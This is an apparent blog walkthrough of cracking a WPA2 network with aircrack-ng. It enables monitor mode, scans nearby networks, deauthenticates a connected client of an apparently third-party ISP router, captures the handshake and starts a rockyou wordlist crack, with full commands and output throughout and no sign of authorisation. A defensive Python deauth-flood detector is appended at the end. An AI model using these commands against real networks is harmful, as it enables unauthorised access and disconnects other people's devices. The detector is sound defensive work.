Posted: . At: 2:36 PM. This was 7 years ago. Post ID: 11250

Cracking a WPA2 network with aircrack-ng and Parrot.
Starting a USB wireless interface in monitor mode.

┌─[root@parrot][/home/jason]
└──╼ #airmon-ng start wlan1
 
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
  593 NetworkManager
  749 wpa_supplicant
  923 dhclient
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1	wlan1		rt73usb		Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
 
		(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
		(mac80211 station mode vif disabled for [phy1]wlan1)

Now we need to list all wireless networks to find the one we wish to attack.

┌─[root@parrot][/home/jason/Documents]
└──╼ #airodump-ng wlan1mon

I got this output.

 CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                          
 E0:B9:E5:B8:31:BB  -39       30        0    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                         
 E0:B9:E5:6E:D3:69  -77       29        0    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                         
 F4:6B:EF:B8:E9:27  -78       17        0    0  11  54e  WPA2 CCMP   PSK  OPTUS_B8E926                                                          
 FA:AB:05:CF:98:E2  -85        2        0    0   6  54e  OPN              Telstra Air                                                           
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                       
 
 00:25:00:FF:94:73  82:FC:02:C5:6D:52  -79    0 -12      0       10                                                                              
 F4:6B:EF:B8:E9:27  A0:2C:36:E3:CD:C1  -81    0 - 1      0        8                                                                              
 F4:6B:EF:B8:E9:27  F0:C7:7F:78:19:D5  -83    0 - 1      0        1

Select the MAC address (BSSID) of the target access point, and then we are ready to begin attacking it.

┌─[root@parrot][/home/user]
└──╼ #airodump-ng --bssid E0:B9:E5:6E:D3:69 -c 6 --write password wlan1mon
 CH  6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:6E:D3:69  -77 100     2540      137    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                     
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
 
 E0:B9:E5:6E:D3:69  68:64:4B:2A:10:18  -83    2e- 1      0     1600

There are clients on the wireless network, so we can assist the attack by kicking a client off.

Send a deauth from a separate terminal window to a wireless client to disconnect it, so that the WPA handshake can be captured when it reconnects.

┌─[root@parrot][/home/jason]
└──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon
08:19:14  Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6
08:19:14  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs]
08:19:15  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs]

The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.

Now I am trying to crack the wireless Pre Shared Key with a wordlist.

┌─[root@parrot][/home/jason]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

This is what it looks like. But the passkey needs to be in the wordlist to crack it.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:27] 45676/9822768 keys tested (1715.21 k/s) 
 
      Time left: 1 hour, 35 minutes, 0 seconds                   0.47%
 
                       Current passphrase: lovinhim1                  
 
 
      Master Key     : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37 
                       A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04 
 
      Transient Key  : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80 
                       65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A 
                       F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA 
                       B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41 
 
      EAPOL HMAC     : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39

This attack works once a client is successfully kicked off the network: the client reconnects, and the handshake is captured to a file automatically. This is a great way to crack a wireless network, but the hard part is cracking the Pre Shared Key, which requires a massive wordlist to run against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, the Pre Shared Key can be cracked.
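A defender-side counterpart to the deauth step above, added here and not part of the original post: a small detector that parses bare 802.11 management frames (no radiotap header assumed) and raises one alert when a burst of directed deauthentication frames hits a single station within a short window. The frames, timestamps and the threshold are constructed for the demo, reusing the BSSID and client addresses shown in the capture above.

```python
import struct
from collections import defaultdict, deque

DEAUTH, BEACON = 0xC, 0x8   # 802.11 management frame subtypes
def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)
def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))

def build_frame(subtype, dst, src, bssid, reason=7) -> bytes:
    """Constructed bare 802.11 management frame (no radiotap): FC, duration,
    addr1=dst, addr2=src, addr3=bssid, seq ctrl, 2-byte reason code."""
    hdr = bytes([subtype << 4, 0]) + b"\x00\x00"       # type bits 00 = management
    return hdr + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00" + struct.pack("<H", reason)

def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < 24 or ((frame[0] >> 2) & 0x3) != 0:
        return None
    return frame[0] >> 4, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])

class DeauthFloodDetector:
    """Alert once per (BSSID, station) when >= threshold deauths arrive within `window` s."""
    def __init__(self, threshold=20, window=2.0):
        self.threshold, self.window = threshold, window
        self.history = defaultdict(deque)   # (bssid, station) -> recent timestamps
        self.alerts = {}                    # (bssid, station) -> time of first alert
    def feed(self, ts: float, frame: bytes):
        parsed = parse_mgmt(frame)
        if parsed is None or parsed[0] != DEAUTH:
            return None                     # not a deauth: beacons, probes, data, etc.
        _, dst, _src, bssid = parsed
        key, q = (bssid, dst), self.history[(bssid, dst)]
        q.append(ts)
        while q and ts - q[0] > self.window:  # slide the window forward
            q.popleft()
        if len(q) >= self.threshold and key not in self.alerts:
            self.alerts[key] = ts
            return key
        return None

def demo():
    """Constructed traffic: a 64-frame deauth burst in one second (the burst size aireplay-ng
    reports above), one single deauth from another AP, and a beacon; only the burst alerts."""
    det = DeauthFloodDetector()
    ap, sta = "E0:B9:E5:6E:D3:69", "68:64:4B:2A:10:18"
    for i in range(64):
        det.feed(i / 64, build_frame(DEAUTH, sta, ap, ap))
    det.feed(0.5, build_frame(DEAUTH, "A0:2C:36:E3:CD:C1", "F4:6B:EF:B8:E9:27", "F4:6B:EF:B8:E9:27", reason=3))
    det.feed(0.6, build_frame(BEACON, "FF:FF:FF:FF:FF:FF", ap, ap))
    return sorted(det.alerts)
```

On a real monitor-mode capture you would strip the radiotap header first and feed each frame with its capture timestamp; a single deauth with a normal reason code never trips the threshold, so only the flood pattern is flagged.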
